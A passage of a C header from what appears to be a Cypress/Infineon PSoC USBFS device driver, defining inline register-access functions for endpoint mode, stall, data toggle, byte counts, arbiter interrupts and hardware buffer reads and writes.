* SIE mode defines data endpoint response to host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpMode(USBFS_Type *base, uint32_t endpoint, uint32_t mode)
{
    /* Read-modify-write: replaces only the MODE field, preserving other bits
     * (note: hardware clears most other bits on any CR0 write - see banner) */
    USBFS_DEV_SIE_EP_CR0(base, endpoint) = _CLR_SET_FLD32U(USBFS_DEV_SIE_EP_CR0(base, endpoint),
    USBFS_USBDEV_SIE_EP1_CR0_MODE, mode);
    /* Dummy read-back - presumably flushes the posted write; keep in place */
    (void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpMode
****************************************************************************//**
*
* Returns SIE mode in the CR0 register of the endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* SIE mode (defines data endpoint response to host request).
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpMode(USBFS_Type const *base, uint32_t endpoint)
{
    /* Isolates the MODE field of the endpoint's CR0 register */
    return (USBFS_DEV_SIE_EP_CR0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CR0_MODE_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpStall
****************************************************************************//**
*
* Configures endpoint to STALL requests.
*
* \param base
* The pointer to the USBFS instance.
*
* \param inDirection
* Defines whether endpoint direction is IN (true) or OUT (false).
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpStall(USBFS_Type *base, bool inDirection, uint32_t endpoint)
{
    /* STALL endpoint: set the STALL bit together with the ACK mode matching
     * the endpoint direction (full register write, other bits cleared) */
    USBFS_DEV_SIE_EP_CR0(base, endpoint) = USBFS_USBDEV_SIE_EP1_CR0_STALL_Msk |
    (inDirection ? CY_USBFS_DEV_DRV_EP_CR_ACK_IN :
    CY_USBFS_DEV_DRV_EP_CR_ACK_OUT);
    /* Dummy read-back - presumably flushes the posted write; keep in place */
    (void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpStall
****************************************************************************//**
*
* Writes SIE mode register of the data endpoint and clears other bits in this
* register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mode
* SIE mode defines data endpoint response to host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpStall(USBFS_Type *base, uint32_t endpoint, uint32_t mode)
{
    /* Set mode bits: replace the MODE field while keeping the rest of CR0 */
    uint32_t regVal = _CLR_SET_FLD32U(USBFS_DEV_SIE_EP_CR0(base, endpoint),
    USBFS_USBDEV_SIE_EP1_CR0_MODE, mode);
    /* Clear STALL condition */
    regVal &= ~USBFS_USBDEV_SIE_EP1_CR0_STALL_Msk;
    /* Clear STALL condition and set mode in a single register write */
    USBFS_DEV_SIE_EP_CR0(base, endpoint) = regVal;
    /* Dummy read-back - presumably flushes the posted write; keep in place */
    (void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpError
****************************************************************************//**
*
* Returns value of data endpoint error in transaction bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Value of data endpoint error in transaction bit.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpError(USBFS_Type const *base, uint32_t endpoint)
{
    /* Non-zero when the error-in-transaction bit is set; zero otherwise */
    return (USBFS_DEV_SIE_EP_CR0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CR0_ERR_IN_TXN_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpToggle
****************************************************************************//**
*
* Returns current value of data endpoint toggle bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Value of data endpoint toggle bit.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpToggle(USBFS_Type const *base, uint32_t endpoint)
{
    /* Return data toggle bit (zero or USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk) */
    return (USBFS_DEV_SIE_EP_CNT0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpToggle
****************************************************************************//**
*
* Resets to zero data endpoint toggle bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpToggle(USBFS_Type *base, uint32_t endpoint)
{
    /* Clear data toggle bit (read-modify-write; other CNT0 bits preserved) */
    USBFS_DEV_SIE_EP_CNT0(base, endpoint) &= ~USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpCount
****************************************************************************//**
*
* Returns the number of data bytes written into the OUT data endpoint
* by the host.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Number of bytes written by the host into the endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpCount(USBFS_Type const *base, uint32_t endpoint)
{
    /* The transfer byte count is split across two registers: the MSB lives in
     * CNT0 and the LSB in CNT1 (odd-offset register, special read macro).
     * Read CNT0 first, then CNT1, matching the original access order. */
    uint32_t countMsb = _FLD2VAL(USBFS_USBDEV_SIE_EP1_CNT0_DATA_COUNT_MSB,
                                 USBFS_DEV_SIE_EP_CNT0(base, endpoint));
    uint32_t countLsb = CY_USBFS_DEV_READ_ODD(USBFS_DEV_SIE_EP_CNT1(base, endpoint));

    /* The SIE count includes the 2 appended CRC bytes - exclude them */
    return (((countMsb << 8U) | countLsb) - CY_USBFS_DEV_DRV_EP_CRC_SIZE);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpCount
****************************************************************************//**
*
* Configures number of bytes and toggle bit to return on the host read request
* to the IN data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param count
* The number of bytes to return on the host read request.
*
* \param toggle
* The data toggle bit.
* The range of valid values: 0 and \ref USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpCount(USBFS_Type *base, uint32_t endpoint,
uint32_t count, uint32_t toggle)
{
    /* Low byte of the count goes to CNT1 (odd-offset register, special write
     * macro); high byte plus the data toggle bit go to CNT0. */
    USBFS_DEV_SIE_EP_CNT1(base, endpoint) = (uint32_t) CY_USBFS_DEV_DRV_WRITE_ODD(CY_LO8(count));
    USBFS_DEV_SIE_EP_CNT0(base, endpoint) = (uint32_t) CY_HI8(count) | toggle;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus
****************************************************************************//**
*
* Returns the SIE data endpoints interrupt request register.
* This register contains the current status of the SIE data endpoints transfer
* completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* The returned status specifies for which endpoint interrupt is active as
* follows: bit 0 corresponds to data endpoint 1, bit 1 data endpoint 2 and so
* on up to \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus(USBFS_Type const *base)
{
    /* Bit N corresponds to data endpoint N+1 */
    return USBFS_DEV_SIE_EP_INT_SR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_EnableSieEpInterrupt
****************************************************************************//**
*
* Enables SIE data endpoint transfer completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
    /* Sets the enable bit for this endpoint, leaving the others unchanged */
    USBFS_DEV_SIE_EP_INT_EN(base) |= (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_DisableSieEpInterrupt
****************************************************************************//**
*
* Disables SIE data endpoint transfer completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
    /* Clears the enable bit for this endpoint, leaving the others unchanged */
    USBFS_DEV_SIE_EP_INT_EN(base) &= ~ (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpInterrupt
****************************************************************************//**
*
* Clears the SIE EP interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
    /* Write-1-to-clear the endpoint's bit in the request register */
    USBFS_DEV_SIE_EP_INT_SR(base) = (uint32_t)(1UL << endpoint);
    /* Dummy read-back - presumably flushes the posted write so the clear
     * completes before the ISR returns; keep in place */
    (void) USBFS_DEV_SIE_EP_INT_SR(base);
}
/** \} group_usbfs_drv_drv_reg_sie_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus
****************************************************************************//**
*
* Returns the arbiter interrupt request register.
* This register contains the current status of the data endpoints arbiter
* interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* The returned status specifies for which endpoint interrupt is active as
* follows: bit 0 corresponds to data endpoint 1, bit 1 data endpoint 2, and so
* on up to \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus(USBFS_Type const *base)
{
    /* Odd-offset register: use the special read macro. Bit N maps to
     * data endpoint N+1. */
    return CY_USBFS_DEV_READ_ODD(USBFS_DEV_ARB_INT_SR(base));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_EnableArbEpInterrupt
****************************************************************************//**
*
* Enables the arbiter interrupt for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
    /* Sets the arbiter-interrupt enable bit for this endpoint only */
    USBFS_DEV_ARB_INT_EN(base) |= (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_DisableArbEpInterrupt
****************************************************************************//**
*
* Disables the arbiter interrupt for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
    /* Clears the arbiter-interrupt enable bit for this endpoint only */
    USBFS_DEV_ARB_INT_EN(base) &= ~(uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbEpInterruptMask
****************************************************************************//**
*
* Enables the arbiter interrupt sources which trigger the arbiter interrupt for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mask
* The arbiter interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpInterruptMask(USBFS_Type *base, uint32_t endpoint, uint32_t mask)
{
    /* Overwrites the per-endpoint arbiter interrupt-enable register */
    USBFS_DEV_ARB_EP_INT_EN(base, endpoint) = mask;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbEpInterruptMask
****************************************************************************//**
*
* Returns the arbiter interrupt sources which trigger the arbiter interrupt for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The arbiter interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptMask(USBFS_Type const *base, uint32_t endpoint)
{
    /* Enabled arbiter interrupt sources for this endpoint */
    return USBFS_DEV_ARB_EP_INT_EN(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked
****************************************************************************//**
*
* Returns the current status of the enabled arbiter interrupt sources for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The current status of the enabled arbiter interrupt sources
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked(USBFS_Type const *base, uint32_t endpoint)
{
    /* Enabled-sources mask (odd-offset register, special read macro) */
    uint32_t mask = CY_USBFS_DEV_READ_ODD(USBFS_DEV_ARB_EP_INT_EN(base, endpoint));
    /* Mask the raw status down to the enabled sources */
    return (USBFS_DEV_ARB_EP_SR(base, endpoint) & mask);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearArbEpInterrupt
****************************************************************************//**
*
* Clears the current status of the arbiter interrupt sources for the specified
* data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mask
* The arbiter interrupt sources to be cleared.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbEpInterrupt(USBFS_Type *base, uint32_t endpoint, uint32_t mask)
{
    /* Write-1-to-clear the selected arbiter interrupt sources */
    USBFS_DEV_ARB_EP_SR(base, endpoint) = mask;
    /* Dummy read-back - presumably flushes the posted write; keep in place */
    (void) USBFS_DEV_ARB_EP_SR(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbEpConfig
****************************************************************************//**
*
* Writes the configuration register for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param cfg
* The value written into the data endpoint configuration register.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpConfig(USBFS_Type *base, uint32_t endpoint, uint32_t cfg)
{
    /* Full write of the per-endpoint arbiter configuration register */
    USBFS_DEV_ARB_EP_CFG(base, endpoint) = cfg;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbCfgEpInReady
****************************************************************************//**
*
* Notifies the hardware that the IN endpoint data buffer is ready to be loaded
* into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbCfgEpInReady(USBFS_Type *base, uint32_t endpoint)
{
    /* Sets IN_DATA_RDY, signalling the hardware that IN data is ready */
    USBFS_DEV_ARB_EP_CFG(base, endpoint) |= USBFS_USBDEV_ARB_EP1_CFG_IN_DATA_RDY_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady
****************************************************************************//**
*
* Clears the hardware notification that the IN endpoint data buffer is ready to
* be loaded into the hardware buffer. This function needs to be called after
* the data was copied into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady(USBFS_Type *base, uint32_t endpoint)
{
    /* Clears IN_DATA_RDY once the data has been copied to the hardware buffer */
    USBFS_DEV_ARB_EP_CFG(base, endpoint) &= ~USBFS_USBDEV_ARB_EP1_CFG_IN_DATA_RDY_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq
****************************************************************************//**
*
* Triggers a DMA request to read from or write data into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq(USBFS_Type *base, uint32_t endpoint)
{
    /* Generates DMA request by pulsing DMA_REQ: set, then clear. The dummy
     * reads between the writes presumably guarantee the set is observed by
     * the peripheral before the clear - keep the set/read/clear/read order. */
    USBFS_DEV_ARB_EP_CFG(base, endpoint) |= USBFS_USBDEV_ARB_EP1_CFG_DMA_REQ_Msk;
    (void) USBFS_DEV_ARB_EP_CFG(base, endpoint);
    USBFS_DEV_ARB_EP_CFG(base, endpoint) &= ~USBFS_USBDEV_ARB_EP1_CFG_DMA_REQ_Msk;
    (void) USBFS_DEV_ARB_EP_CFG(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbWriteAddr
****************************************************************************//**
*
* Sets write address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param wa
* Write address value.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbWriteAddr(USBFS_Type *base, uint32_t endpoint, uint32_t wa)
{
    /* 16-bit write address (endpoint buffer start) in the hardware buffer */
    USBFS_DEV_ARB_RW_WA16(base, endpoint) = wa;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbReadAddr
****************************************************************************//**
*
* Sets read address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param ra
* Read address value.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbReadAddr(USBFS_Type *base, uint32_t endpoint, uint32_t ra)
{
    /* Programs the arbiter read address: start of the endpoint's hardware buffer. */
    USBFS_DEV_ARB_RW_RA16(base, endpoint) = ra;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbWriteAddr
****************************************************************************//**
*
* Returns write address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Write address in the hardware buffer for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbWriteAddr(USBFS_Type const *base, uint32_t endpoint)
{
    /* Returns the current arbiter write address for the endpoint. */
    return (USBFS_DEV_ARB_RW_WA16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbReadAddr
****************************************************************************//**
*
* Returns read address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Read address in the hardware buffer for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbReadAddr(USBFS_Type const *base, uint32_t endpoint)
{
    /* Returns the current arbiter read address for the endpoint. */
    return (USBFS_DEV_ARB_RW_RA16(base, endpoint));
}
/** \} group_usbfs_drv_drv_reg_arbiter */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter_data
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteData
****************************************************************************//**
*
* Writes a byte (8-bit) into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param byte
* The byte of data to be written into the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData(USBFS_Type *base, uint32_t endpoint, uint8_t byte)
{
    /* 8-bit write into the endpoint's hardware buffer via the arbiter data register. */
    USBFS_DEV_ARB_RW_DR(base, endpoint) = (uint32_t) byte;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteData16
****************************************************************************//**
*
* Writes a half-word (16-bit) into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param halfword
* The half-word of data to be written into the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData16(USBFS_Type *base, uint32_t endpoint, uint16_t halfword)
{
    /* 16-bit write into the endpoint's hardware buffer via the arbiter data register. */
    USBFS_DEV_ARB_RW_DR16(base, endpoint) = (uint32_t) halfword;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadData
****************************************************************************//**
*
* Reads a byte (8-bit) from the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The byte of data to be read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint8_t Cy_USBFS_Dev_Drv_ReadData(USBFS_Type const *base, uint32_t endpoint)
{
    /* 8-bit read from the endpoint's hardware buffer via the arbiter data register. */
    return ((uint8_t) USBFS_DEV_ARB_RW_DR(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadData16
****************************************************************************//**
*
* Reads a half-word (16-bit) from the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The half-word of data to be read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint16_t Cy_USBFS_Dev_Drv_ReadData16(USBFS_Type const *base, uint32_t endpoint)
{
    /* 16-bit read from the endpoint's hardware buffer via the arbiter data register. */
    return ((uint16_t) USBFS_DEV_ARB_RW_DR16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetDataRegAddr
****************************************************************************//**
*
* Returns pointer to the 8-bit data register for the specified endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The pointer to the 8-bit data register for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataRegAddr(USBFS_Type *base, uint32_t endpoint)
{
    /* Address of the 8-bit data register; typically used as a DMA source/destination. */
    return (&USBFS_DEV_ARB_RW_DR(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetDataReg16Addr
****************************************************************************//**
*
* Returns pointer to the 16-bit data register for the specified endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The pointer to the 16-bit data register for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataReg16Addr(USBFS_Type *base, uint32_t endpoint)
{
    /* Address of the 16-bit data register; typically used as a DMA source/destination. */
    return (&USBFS_DEV_ARB_RW_DR16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_FlushInBuffer
****************************************************************************//**
*
* Flushes IN endpoint buffer: sets WA pointer (controlled by CPU/DMA) to equal
* RA (controlled by SIE; gets automatically reset on transfer completion).
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_FlushInBuffer(USBFS_Type *base, uint32_t endpoint)
{
    /* Discard any unsent IN data by rewinding the CPU/DMA write pointer (WA)
       back to the SIE read pointer (RA). */
    Cy_USBFS_Dev_Drv_SetArbWriteAddr(base, endpoint,
                                     Cy_USBFS_Dev_Drv_GetArbReadAddr(base, endpoint));
}
/** \} group_usbfs_drv_drv_reg_arbiter_data */
/**
* \addtogroup group_usbfs_drv_drv_reg_misc
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetEpType
****************************************************************************//**
*
* Sets the data endpoint direction.
*
* \param base
* The pointer to the USBFS instance.
*
* \param inDirection
* Defines whether endpoint direction is IN (true) or OUT (false).
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEpType(USBFS_Type *base, bool inDirection, uint32_t endpoint)
{
    /* Sets the endpoint direction bit in EP_TYPE: cleared = IN, set = OUT. */
    uint32_t const epBit = (uint32_t) (0x1UL << endpoint);
    uint32_t value = CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP_TYPE(base));

    /* IN direction clears the endpoint's bit, OUT direction sets it. */
    value = inDirection ? (value & ~epBit) : (value | epBit);

    USBFS_DEV_EP_TYPE(base) = CY_USBFS_DEV_DRV_WRITE_ODD(value);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSofNubmer
****************************************************************************//**
*
* Returns the SOF frame number.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The SOF frame number.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSofNubmer(USBFS_Type const *base)
{
    /* NOTE(review): "Nubmer" is a typo for "Number", but the function name is
       public API, so it is kept for backward compatibility. */
    /* Extracts the 11-bit SOF frame number from the SOF16 register. */
    return _FLD2VAL(USBFS_USBDEV_SOF16_FRAME_NUMBER16, USBFS_DEV_SOF16(base));
}
/** \} group_usbfs_drv_drv_reg_misc */
#if defined(__cplusplus)
}
#endif
#endif /* CY_IP_MXUSBFS */
#endif /* (CY_USBFS_DEV_DRV_REG_H) */
/** \endcond */
/* [] END OF FILE */
| 18,682
|
6,119
|
